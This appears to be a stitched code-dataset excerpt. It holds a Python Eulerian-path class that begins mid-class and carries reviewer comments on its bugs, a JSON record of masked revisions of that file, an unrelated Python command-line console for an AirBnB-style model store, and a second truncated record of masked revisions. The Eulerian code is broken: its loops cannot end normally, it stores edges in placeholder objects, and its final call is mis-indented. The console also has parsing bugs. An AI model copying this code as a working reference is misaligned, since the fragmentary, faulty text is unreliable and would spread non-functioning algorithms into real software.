    # a second EulerianPath would append to (or inherit the None left by)
    # the first one's path — confirm whether it should be created per
    # instance in __init__ instead.
    _path = deque()  # stack

    class EEdge(Edge):
        # Edge augmented with a "used" flag so the DFS can skip an edge it
        # already traversed via the other endpoint's adjacency list.

        def __init__(self, v=0, w=0, is_used=False):
            super().__init__(v, w)
            self._is_used = is_used

        def get_is_used(self):
            # True once the DFS has consumed this edge.
            return self._is_used

        def __repr__(self):
            return f'<{self.__class__.__name__}(' \
                   f'v={super().get_v()}, ' \
                   f'w={super().get_w()}, ' \
                   f'weight={super().weight()}, ' \
                   f'_is_used={self.get_is_used()})>'

    def __init__(self, g):
        """Search graph ``g`` for an Eulerian path; result lands in _path
        (set to None when no path exists)."""
        # find vertex from which to start potential Eulerian path:
        # a vertex v with odd degree(v) if it exits;
        # otherwise a vertex with degree(v) > 0
        self.g = g
        odd_degree_vertices = 0
        self.adj = deque()
        # One EEdge placeholder per vertex.
        # NOTE(review): edges are later pushed with adj[v].append(e) and
        # popped with adj[v].popleft(); that assumes Edge/EEdge exposes
        # deque-like append/popleft — a deque of per-vertex deques may have
        # been intended. TODO confirm against the Edge class.
        for v in range(g.get_V()):
            self.adj.append(EulerianPath.EEdge(v))
        s = EulerianPath.__non_isolated_vertex(g)
        for v in range(g.get_V()):
            if g.degree(v) % 2 != 0:
                odd_degree_vertices += 1
                s = v
        # Eulerian path iff it has at most two graph vertices of odd degree
        if odd_degree_vertices > 2:
            return
        # special case for graph with 0 edges (has a degenerate Eulerian Path)
        if s == -1:
            s = 0

        adj = self.adj
        # Build the per-vertex edge containers; each undirected edge object
        # is shared by both endpoints, so marking it used once hides it
        # from both adjacency lists.
        for v in range(g.get_V()):
            self_loops = 0
            for w in g.adj_vertices(v):
                # careful with self loops: a self loop shows up twice when
                # iterating v's neighbors, so only record every other one
                if v == w.item:
                    if self_loops % 2 == 0:
                        e = EulerianPath.EEdge(v, w.item)
                        adj[v].append(e)
                        adj[w.item].append(e)
                    self_loops += 1
                elif v < w.item:
                    # v < w.item guarantees each (v, w) edge is added once.
                    e = EulerianPath.EEdge(v, w.item)
                    adj[v].append(e)
                    adj[w.item].append(e)
        stack = deque()
        stack.append(s)
        # greedily search through edges in iterative DFS style
        # NOTE(review): a deque is never None, so both `is not None` tests
        # below are always true; these loops can only stop via IndexError
        # from pop()/popleft() on an empty container — presumably
        # `while stack:` / `while adj[v]:` was intended. Confirm.
        while stack is not None:
            v = stack.pop()
            while adj[v] is not None:
                edge = adj[v].popleft()
                print(edge)
                if edge.get_is_used():
                    continue
                edge._is_used = True
                stack.append(v)
                v = edge.other(v)
            # push vertex with no more leaving edges to path
            self.get_path().append(v)

        # check if all edges are used
        if len(self.get_path()) != g.get_E() + 1:
            self._path = None

    def get_path(self):
        # Raw path container (a deque), or None when no Eulerian path exists.
        return self._path

    def path(self):
        # Yield the path's vertices in order. Raises TypeError when no path
        # was found (get_path() is None) — callers should check
        # has_eulerian_path() first.
        yield from list(self.get_path())

    def has_eulerian_path(self):
        return self.get_path() is not None

    @staticmethod
    def __non_isolated_vertex(g):
        # Return any vertex with degree > 0, or -1 if the graph has no edges.
        for v in range(g.get_V()):
            if g.degree(v) > 0:
                return v
        return -1

    def __repr__(self):
        return f'adj = {self.adj}, \n' \
               f'path={self.get_path()}'
def main():
    """Build the tinyG sample graph, search it for an Eulerian path, and
    print the path's vertices (or 'None' when no path exists)."""
    graph = Graph(13)
    with open('../resources/tinyG.txt') as src:
        for raw in src:
            # Strip the line ending, then split on single spaces.
            tokens = ' '.join(raw.splitlines()).split(' ')
            if len(tokens) >= 2:
                graph.add_edge(int(tokens[0]), int(tokens[1]))
    print(graph)
    finder = EulerianPath(graph)
    print(finder)
    print('Eulerian path: ')
    if not finder.has_eulerian_path():
        print('None')
    else:
        for vertex in finder.path():
            print(f'{vertex} ')
        print()
    print()
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "73e6930c6866d3ccdbccec925bfc5e7e4702feb9",
"index": 8348,
"step-1": "<mask token>\n\n\nclass EulerianPath:\n <mask token>\n\n\n class EEdge(Edge):\n\n def __init__(self, v=0, w=0, is_used=False):\n super().__init__(v, w)\n self._is_used = is_used\n\n def get_is_used(self):\n return self._is_used\n\n def __repr__(self):\n return (\n f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'\n )\n\n def __init__(self, g):\n self.g = g\n odd_degree_vertices = 0\n self.adj = deque()\n for v in range(g.get_V()):\n self.adj.append(EulerianPath.EEdge(v))\n s = EulerianPath.__non_isolated_vertex(g)\n for v in range(g.get_V()):\n if g.degree(v) % 2 != 0:\n odd_degree_vertices += 1\n s = v\n if odd_degree_vertices > 2:\n return\n if s == -1:\n s = 0\n adj = self.adj\n for v in range(g.get_V()):\n self_loops = 0\n for w in g.adj_vertices(v):\n if v == w.item:\n if self_loops % 2 == 0:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n self_loops += 1\n elif v < w.item:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n stack = deque()\n stack.append(s)\n while stack is not None:\n v = stack.pop()\n while adj[v] is not None:\n edge = adj[v].popleft()\n print(edge)\n if edge.get_is_used():\n continue\n edge._is_used = True\n stack.append(v)\n v = edge.other(v)\n self.get_path().append(v)\n if len(self.get_path()) != g.get_E() + 1:\n self._path = None\n\n def get_path(self):\n return self._path\n\n def path(self):\n yield from list(self.get_path())\n\n def has_eulerian_path(self):\n return self.get_path() is not None\n\n @staticmethod\n def __non_isolated_vertex(g):\n for v in range(g.get_V()):\n if g.degree(v) > 0:\n return v\n return -1\n\n def __repr__(self):\n return f'adj = {self.adj}, \\npath={self.get_path()}'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass EulerianPath:\n _path = deque()\n\n\n class EEdge(Edge):\n\n def __init__(self, v=0, w=0, is_used=False):\n super().__init__(v, w)\n self._is_used = is_used\n\n def get_is_used(self):\n return self._is_used\n\n def __repr__(self):\n return (\n f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'\n )\n\n def __init__(self, g):\n self.g = g\n odd_degree_vertices = 0\n self.adj = deque()\n for v in range(g.get_V()):\n self.adj.append(EulerianPath.EEdge(v))\n s = EulerianPath.__non_isolated_vertex(g)\n for v in range(g.get_V()):\n if g.degree(v) % 2 != 0:\n odd_degree_vertices += 1\n s = v\n if odd_degree_vertices > 2:\n return\n if s == -1:\n s = 0\n adj = self.adj\n for v in range(g.get_V()):\n self_loops = 0\n for w in g.adj_vertices(v):\n if v == w.item:\n if self_loops % 2 == 0:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n self_loops += 1\n elif v < w.item:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n stack = deque()\n stack.append(s)\n while stack is not None:\n v = stack.pop()\n while adj[v] is not None:\n edge = adj[v].popleft()\n print(edge)\n if edge.get_is_used():\n continue\n edge._is_used = True\n stack.append(v)\n v = edge.other(v)\n self.get_path().append(v)\n if len(self.get_path()) != g.get_E() + 1:\n self._path = None\n\n def get_path(self):\n return self._path\n\n def path(self):\n yield from list(self.get_path())\n\n def has_eulerian_path(self):\n return self.get_path() is not None\n\n @staticmethod\n def __non_isolated_vertex(g):\n for v in range(g.get_V()):\n if g.degree(v) > 0:\n return v\n return -1\n\n def __repr__(self):\n return f'adj = {self.adj}, \\npath={self.get_path()}'\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass EulerianPath:\n _path = deque()\n\n\n class EEdge(Edge):\n\n def __init__(self, v=0, w=0, is_used=False):\n super().__init__(v, w)\n self._is_used = is_used\n\n def get_is_used(self):\n return self._is_used\n\n def __repr__(self):\n return (\n f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'\n )\n\n def __init__(self, g):\n self.g = g\n odd_degree_vertices = 0\n self.adj = deque()\n for v in range(g.get_V()):\n self.adj.append(EulerianPath.EEdge(v))\n s = EulerianPath.__non_isolated_vertex(g)\n for v in range(g.get_V()):\n if g.degree(v) % 2 != 0:\n odd_degree_vertices += 1\n s = v\n if odd_degree_vertices > 2:\n return\n if s == -1:\n s = 0\n adj = self.adj\n for v in range(g.get_V()):\n self_loops = 0\n for w in g.adj_vertices(v):\n if v == w.item:\n if self_loops % 2 == 0:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n self_loops += 1\n elif v < w.item:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n stack = deque()\n stack.append(s)\n while stack is not None:\n v = stack.pop()\n while adj[v] is not None:\n edge = adj[v].popleft()\n print(edge)\n if edge.get_is_used():\n continue\n edge._is_used = True\n stack.append(v)\n v = edge.other(v)\n self.get_path().append(v)\n if len(self.get_path()) != g.get_E() + 1:\n self._path = None\n\n def get_path(self):\n return self._path\n\n def path(self):\n yield from list(self.get_path())\n\n def has_eulerian_path(self):\n return self.get_path() is not None\n\n @staticmethod\n def __non_isolated_vertex(g):\n for v in range(g.get_V()):\n if g.degree(v) > 0:\n return v\n return -1\n\n def __repr__(self):\n return f'adj = {self.adj}, \\npath={self.get_path()}'\n\n\ndef main():\n g = Graph(13)\n with open('../resources/tinyG.txt') as f:\n for line in f.readlines():\n vertices = ' '.join(line.splitlines()).split(' ')\n if len(vertices) < 2:\n 
continue\n else:\n v1, v2 = int(vertices[0]), int(vertices[1])\n g.add_edge(v1, v2)\n print(g)\n euler = EulerianPath(g)\n print(euler)\n print('Eulerian path: ')\n if euler.has_eulerian_path():\n for v in euler.path():\n print(f'{v} ')\n print()\n else:\n print('None')\n print()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nfrom graphs.edge import Edge\nfrom graphs.graph import Graph\nfrom collections import deque, defaultdict\n\n\nclass EulerianPath:\n _path = deque()\n\n\n class EEdge(Edge):\n\n def __init__(self, v=0, w=0, is_used=False):\n super().__init__(v, w)\n self._is_used = is_used\n\n def get_is_used(self):\n return self._is_used\n\n def __repr__(self):\n return (\n f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'\n )\n\n def __init__(self, g):\n self.g = g\n odd_degree_vertices = 0\n self.adj = deque()\n for v in range(g.get_V()):\n self.adj.append(EulerianPath.EEdge(v))\n s = EulerianPath.__non_isolated_vertex(g)\n for v in range(g.get_V()):\n if g.degree(v) % 2 != 0:\n odd_degree_vertices += 1\n s = v\n if odd_degree_vertices > 2:\n return\n if s == -1:\n s = 0\n adj = self.adj\n for v in range(g.get_V()):\n self_loops = 0\n for w in g.adj_vertices(v):\n if v == w.item:\n if self_loops % 2 == 0:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n self_loops += 1\n elif v < w.item:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n stack = deque()\n stack.append(s)\n while stack is not None:\n v = stack.pop()\n while adj[v] is not None:\n edge = adj[v].popleft()\n print(edge)\n if edge.get_is_used():\n continue\n edge._is_used = True\n stack.append(v)\n v = edge.other(v)\n self.get_path().append(v)\n if len(self.get_path()) != g.get_E() + 1:\n self._path = None\n\n def get_path(self):\n return self._path\n\n def path(self):\n yield from list(self.get_path())\n\n def has_eulerian_path(self):\n return self.get_path() is not None\n\n @staticmethod\n def __non_isolated_vertex(g):\n for v in range(g.get_V()):\n if g.degree(v) > 0:\n return v\n return -1\n\n def __repr__(self):\n return f'adj = {self.adj}, \\npath={self.get_path()}'\n\n\ndef main():\n g = Graph(13)\n with open('../resources/tinyG.txt') as f:\n for 
line in f.readlines():\n vertices = ' '.join(line.splitlines()).split(' ')\n if len(vertices) < 2:\n continue\n else:\n v1, v2 = int(vertices[0]), int(vertices[1])\n g.add_edge(v1, v2)\n print(g)\n euler = EulerianPath(g)\n print(euler)\n print('Eulerian path: ')\n if euler.has_eulerian_path():\n for v in euler.path():\n print(f'{v} ')\n print()\n else:\n print('None')\n print()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\"\"\"\neulerian_path.py\nAn Eulerian path, also called an Euler chain, Euler trail, Euler walk, or \"Eulerian\" version of any of these\nvariants, is a walk on the graph edges of a graph which uses each graph edge in the original graph exactly once.\nA connected graph has an Eulerian path iff it has at most two graph vertices of odd degree.\n\nThe EulerianPath class represents a data type\n * for finding an Eulerian path in a graph.\n * An Eulerian path is a path (not necessarily simple) that\n * uses every edge in the graph exactly once.\n * This implementation uses a non-recursive depth-first search.\n * The constructor takes Theta(E + V) time in the worst\n * case, where E is the number of edges and V is\n * the number of vertices.\n * Each instance method takes Theta(1) time.\n * It uses Theta(E + V) extra space in the worst case\n * (not including the digraph).\n\"\"\"\nfrom graphs.edge import Edge\nfrom graphs.graph import Graph\nfrom collections import deque, defaultdict\n\n\nclass EulerianPath:\n\n _path = deque() # stack\n\n class EEdge(Edge):\n\n def __init__(self, v=0, w=0, is_used=False):\n super().__init__(v, w)\n self._is_used = is_used\n\n def get_is_used(self):\n return self._is_used\n\n def __repr__(self):\n return f'<{self.__class__.__name__}(' \\\n f'v={super().get_v()}, ' \\\n f'w={super().get_w()}, ' \\\n f'weight={super().weight()}, ' \\\n f'_is_used={self.get_is_used()})>'\n\n def __init__(self, g):\n # find vertex from which to start potential Eulerian path:\n # a vertex v with odd degree(v) if it exits;\n # otherwise a vertex with degree(v) > 0\n self.g = g\n odd_degree_vertices = 0\n self.adj = deque()\n for v in range(g.get_V()):\n self.adj.append(EulerianPath.EEdge(v))\n s = EulerianPath.__non_isolated_vertex(g)\n for v in range(g.get_V()):\n if g.degree(v) % 2 != 0:\n odd_degree_vertices += 1\n s = v\n # Eulerian path iff it has at most two graph vertices of odd degree\n if odd_degree_vertices > 2:\n return\n # special case 
for graph with 0 edges (has a degenerate Eulerian Path)\n if s == -1:\n s = 0\n\n adj = self.adj\n for v in range(g.get_V()):\n self_loops = 0\n for w in g.adj_vertices(v):\n # careful with self loops\n if v == w.item:\n if self_loops % 2 == 0:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n self_loops += 1\n elif v < w.item:\n e = EulerianPath.EEdge(v, w.item)\n adj[v].append(e)\n adj[w.item].append(e)\n stack = deque()\n stack.append(s)\n # greedily search through edges in iterative DFS style\n while stack is not None:\n v = stack.pop()\n while adj[v] is not None:\n edge = adj[v].popleft()\n print(edge)\n if edge.get_is_used():\n continue\n edge._is_used = True\n stack.append(v)\n v = edge.other(v)\n # push vertex with no more leaving edges to path\n self.get_path().append(v)\n\n # check if all edges are used\n if len(self.get_path()) != g.get_E() + 1:\n self._path = None\n\n def get_path(self):\n return self._path\n\n def path(self):\n yield from list(self.get_path())\n\n def has_eulerian_path(self):\n return self.get_path() is not None\n\n @staticmethod\n def __non_isolated_vertex(g):\n for v in range(g.get_V()):\n if g.degree(v) > 0:\n return v\n return -1\n\n def __repr__(self):\n return f'adj = {self.adj}, \\n' \\\n f'path={self.get_path()}'\n\n\ndef main():\n g = Graph(13)\n with open(\"../resources/tinyG.txt\", ) as f:\n for line in f.readlines():\n vertices = \" \".join(line.splitlines()).split(' ')\n if len(vertices) < 2:\n continue\n else:\n v1, v2 = int(vertices[0]), int(vertices[1])\n g.add_edge(v1, v2)\n print(g)\n euler = EulerianPath(g)\n print(euler)\n print('Eulerian path: ')\n if euler.has_eulerian_path():\n for v in euler.path():\n print(f'{v} ')\n print()\n else:\n print('None')\n print()\n\n\nif __name__ == '__main__':\n main()\n\n\n",
"step-ids": [
7,
8,
10,
11,
12
]
}
|
[
7,
8,
10,
11,
12
] |
#!/usr/bin/python3
"""
program of the command interpreter
"""
import cmd
import models
import re
from models.base_model import BaseModel
from models import storage
from models.user import User
from models.state import State
from models.city import City
from models.amenity import Amenity
from models.place import Place
from models.review import Review
class HBNBCommand(cmd.Cmd):
""" This class to setup the command interpreter """
__DCT_CLS = {
"BaseModel": BaseModel,
"User": User,
"State": State,
"City": City,
"Amenity": Amenity,
"Place": Place,
"Review": Review
}
prompt = "(hbnb) "
def do_quit(self, line):
'''Exit the CMD program'''
return True
def do_EOF(self, line):
'''Exit the CMD program'''
return True
def emptyline(self):
'''Do nothing'''
pass
def do_create(self, line):
'''Creates a new instance of BaseModel'''
arg_line = line.split()
if line == "":
print("** class name missing **")
return False
elif arg_line[0] not in self.__DCT_CLS:
print("** class doesn't exist **")
else:
new_instance = self.__DCT_CLS[arg_line[0]]()
print(new_instance.id)
new_instance.save()
def do_show(self, line):
if (type(line) == str):
arg_line = line.split()
len_args = len(arg_line)
if (self.check_if_created(arg_line, len_args) != 1):
get_inst = arg_line[0] + "." + arg_line[1]
dict_classes = models.storage.all()
if get_inst in dict_classes.keys():
print(dict_classes[get_inst])
else:
print("** no instance found **")
else:
srch_id = line[0] + "." + line[1]
dict_classes = models.storage.all()
if srch_id in dict_classes.keys():
print(dict_classes[srch_id])
else:
print("** no instance found **")
def do_destroy(self, line):
arg_line = line.split()
len_args = len(arg_line)
if (self.check_if_created(arg_line, len_args) != 1):
get_inst = arg_line[0] + "." + arg_line[1]
dict_classes = models.storage.all()
if get_inst in dict_classes.keys():
del dict_classes[get_inst]
models.storage.save()
else:
print("** no instance found **")
def do_all(self, line):
arg_line = line.split()
if line == "" or arg_line[0] in self.__DCT_CLS:
dir_classes = models.storage.all()
list_classes = []
for key, value in dir_classes.items():
if line in key:
list_classes.append(value.__str__())
print(list_classes)
else:
print("** class doesn't exist **")
def do_update(self, line):
arg_line = line.split()
len_args = len(arg_line)
if (self.check_if_created(arg_line, len_args) == 1):
pass
elif (len_args == 2):
print("** attribute name missing **")
elif (len_args == 3):
print("** value missing **")
else:
get_inst = arg_line[0] + "." + arg_line[1]
dict_classes = models.storage.all()
if get_inst in dict_classes.keys():
if arg_line[3]:
arg_line[3] = arg_line[3].replace('"', "")
try:
arg_line[3] = int(arg_line[3])
except ValueError:
try:
arg_line[3] = float(arg_line[3])
except ValueError:
arg_line[3] = arg_line[3]
dict_classes[get_inst].__dict__[arg_line[2]] = arg_line[3]
dict_classes[get_inst].save()
else:
print("** no instance found **")
def default(self, line):
'''all method names that aren't defined'''
args_line = line.split('.')
if len(args_line) > 1:
if args_line[1] == "all()":
self.do_all(args_line[0])
if args_line[1] == "count()":
self.do_count(args_line[0])
my_count = args_line[1].split('"')
res = re.findall(r'\(.*?\)', args_line[1])
my_count[0] = my_count[0] + line[-1]
if my_count[0] == "show()":
myNewList = [args_line[0], my_count[1]]
self.do_show(myNewList)
else:
cmd.Cmd.default(self, line)
def check_if_created(self, arg_line, len_args):
'''Verifies if class exists'''
if len_args == 0:
print("** class name missing **")
return 1
elif arg_line[0] not in self.__DCT_CLS:
print("** class doesn't exist **")
return 1
elif (len_args == 1):
print("** instance id missing **")
return 1
def do_count(self, line):
'''Counts the number of existing instances'''
arg_line = line.split()
if line == "" or arg_line[0] in self.__DCT_CLS:
dir_classes = models.storage.all()
list_classes = []
count = 0
for key, value in dir_classes.items():
if line in key:
list_classes.append(value.__str__())
count += 1
print(count)
else:
print("** class doesn't exist **")
if __name__ == "__main__":
HBNBCommand().cmdloop()
|
normal
|
{
"blob_id": "7cbf2082d530c315fdcfdb94f5c6ac4755ea2081",
"index": 1267,
"step-1": "<mask token>\n\n\nclass HBNBCommand(cmd.Cmd):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def emptyline(self):\n \"\"\"Do nothing\"\"\"\n pass\n\n def do_create(self, line):\n \"\"\"Creates a new instance of BaseModel\"\"\"\n arg_line = line.split()\n if line == '':\n print('** class name missing **')\n return False\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n else:\n new_instance = self.__DCT_CLS[arg_line[0]]()\n print(new_instance.id)\n new_instance.save()\n\n def do_show(self, line):\n if type(line) == str:\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n print(dict_classes[get_inst])\n else:\n print('** no instance found **')\n else:\n srch_id = line[0] + '.' + line[1]\n dict_classes = models.storage.all()\n if srch_id in dict_classes.keys():\n print(dict_classes[srch_id])\n else:\n print('** no instance found **')\n\n def do_destroy(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' 
+ arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n del dict_classes[get_inst]\n models.storage.save()\n else:\n print('** no instance found **')\n\n def do_all(self, line):\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n print(list_classes)\n else:\n print(\"** class doesn't exist **\")\n\n def do_update(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) == 1:\n pass\n elif len_args == 2:\n print('** attribute name missing **')\n elif len_args == 3:\n print('** value missing **')\n else:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n if arg_line[3]:\n arg_line[3] = arg_line[3].replace('\"', '')\n try:\n arg_line[3] = int(arg_line[3])\n except ValueError:\n try:\n arg_line[3] = float(arg_line[3])\n except ValueError:\n arg_line[3] = arg_line[3]\n dict_classes[get_inst].__dict__[arg_line[2]] = arg_line[3]\n dict_classes[get_inst].save()\n else:\n print('** no instance found **')\n <mask token>\n\n def check_if_created(self, arg_line, len_args):\n \"\"\"Verifies if class exists\"\"\"\n if len_args == 0:\n print('** class name missing **')\n return 1\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n return 1\n elif len_args == 1:\n print('** instance id missing **')\n return 1\n\n def do_count(self, line):\n \"\"\"Counts the number of existing instances\"\"\"\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n count = 0\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n count += 1\n print(count)\n else:\n print(\"** class doesn't exist 
**\")\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass HBNBCommand(cmd.Cmd):\n <mask token>\n <mask token>\n <mask token>\n\n def do_quit(self, line):\n \"\"\"Exit the CMD program\"\"\"\n return True\n <mask token>\n\n def emptyline(self):\n \"\"\"Do nothing\"\"\"\n pass\n\n def do_create(self, line):\n \"\"\"Creates a new instance of BaseModel\"\"\"\n arg_line = line.split()\n if line == '':\n print('** class name missing **')\n return False\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n else:\n new_instance = self.__DCT_CLS[arg_line[0]]()\n print(new_instance.id)\n new_instance.save()\n\n def do_show(self, line):\n if type(line) == str:\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n print(dict_classes[get_inst])\n else:\n print('** no instance found **')\n else:\n srch_id = line[0] + '.' + line[1]\n dict_classes = models.storage.all()\n if srch_id in dict_classes.keys():\n print(dict_classes[srch_id])\n else:\n print('** no instance found **')\n\n def do_destroy(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' 
+ arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n del dict_classes[get_inst]\n models.storage.save()\n else:\n print('** no instance found **')\n\n def do_all(self, line):\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n print(list_classes)\n else:\n print(\"** class doesn't exist **\")\n\n def do_update(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) == 1:\n pass\n elif len_args == 2:\n print('** attribute name missing **')\n elif len_args == 3:\n print('** value missing **')\n else:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n if arg_line[3]:\n arg_line[3] = arg_line[3].replace('\"', '')\n try:\n arg_line[3] = int(arg_line[3])\n except ValueError:\n try:\n arg_line[3] = float(arg_line[3])\n except ValueError:\n arg_line[3] = arg_line[3]\n dict_classes[get_inst].__dict__[arg_line[2]] = arg_line[3]\n dict_classes[get_inst].save()\n else:\n print('** no instance found **')\n\n def default(self, line):\n \"\"\"all method names that aren't defined\"\"\"\n args_line = line.split('.')\n if len(args_line) > 1:\n if args_line[1] == 'all()':\n self.do_all(args_line[0])\n if args_line[1] == 'count()':\n self.do_count(args_line[0])\n my_count = args_line[1].split('\"')\n res = re.findall('\\\\(.*?\\\\)', args_line[1])\n my_count[0] = my_count[0] + line[-1]\n if my_count[0] == 'show()':\n myNewList = [args_line[0], my_count[1]]\n self.do_show(myNewList)\n else:\n cmd.Cmd.default(self, line)\n\n def check_if_created(self, arg_line, len_args):\n \"\"\"Verifies if class exists\"\"\"\n if len_args == 0:\n print('** class name missing **')\n return 1\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't 
exist **\")\n return 1\n elif len_args == 1:\n print('** instance id missing **')\n return 1\n\n def do_count(self, line):\n \"\"\"Counts the number of existing instances\"\"\"\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n count = 0\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n count += 1\n print(count)\n else:\n print(\"** class doesn't exist **\")\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass HBNBCommand(cmd.Cmd):\n <mask token>\n <mask token>\n <mask token>\n\n def do_quit(self, line):\n \"\"\"Exit the CMD program\"\"\"\n return True\n\n def do_EOF(self, line):\n \"\"\"Exit the CMD program\"\"\"\n return True\n\n def emptyline(self):\n \"\"\"Do nothing\"\"\"\n pass\n\n def do_create(self, line):\n \"\"\"Creates a new instance of BaseModel\"\"\"\n arg_line = line.split()\n if line == '':\n print('** class name missing **')\n return False\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n else:\n new_instance = self.__DCT_CLS[arg_line[0]]()\n print(new_instance.id)\n new_instance.save()\n\n def do_show(self, line):\n if type(line) == str:\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n print(dict_classes[get_inst])\n else:\n print('** no instance found **')\n else:\n srch_id = line[0] + '.' + line[1]\n dict_classes = models.storage.all()\n if srch_id in dict_classes.keys():\n print(dict_classes[srch_id])\n else:\n print('** no instance found **')\n\n def do_destroy(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) != 1:\n get_inst = arg_line[0] + '.' 
+ arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n del dict_classes[get_inst]\n models.storage.save()\n else:\n print('** no instance found **')\n\n def do_all(self, line):\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n print(list_classes)\n else:\n print(\"** class doesn't exist **\")\n\n def do_update(self, line):\n arg_line = line.split()\n len_args = len(arg_line)\n if self.check_if_created(arg_line, len_args) == 1:\n pass\n elif len_args == 2:\n print('** attribute name missing **')\n elif len_args == 3:\n print('** value missing **')\n else:\n get_inst = arg_line[0] + '.' + arg_line[1]\n dict_classes = models.storage.all()\n if get_inst in dict_classes.keys():\n if arg_line[3]:\n arg_line[3] = arg_line[3].replace('\"', '')\n try:\n arg_line[3] = int(arg_line[3])\n except ValueError:\n try:\n arg_line[3] = float(arg_line[3])\n except ValueError:\n arg_line[3] = arg_line[3]\n dict_classes[get_inst].__dict__[arg_line[2]] = arg_line[3]\n dict_classes[get_inst].save()\n else:\n print('** no instance found **')\n\n def default(self, line):\n \"\"\"all method names that aren't defined\"\"\"\n args_line = line.split('.')\n if len(args_line) > 1:\n if args_line[1] == 'all()':\n self.do_all(args_line[0])\n if args_line[1] == 'count()':\n self.do_count(args_line[0])\n my_count = args_line[1].split('\"')\n res = re.findall('\\\\(.*?\\\\)', args_line[1])\n my_count[0] = my_count[0] + line[-1]\n if my_count[0] == 'show()':\n myNewList = [args_line[0], my_count[1]]\n self.do_show(myNewList)\n else:\n cmd.Cmd.default(self, line)\n\n def check_if_created(self, arg_line, len_args):\n \"\"\"Verifies if class exists\"\"\"\n if len_args == 0:\n print('** class name missing **')\n return 1\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't 
exist **\")\n return 1\n elif len_args == 1:\n print('** instance id missing **')\n return 1\n\n def do_count(self, line):\n \"\"\"Counts the number of existing instances\"\"\"\n arg_line = line.split()\n if line == '' or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n count = 0\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n count += 1\n print(count)\n else:\n print(\"** class doesn't exist **\")\n\n\n<mask token>\n",
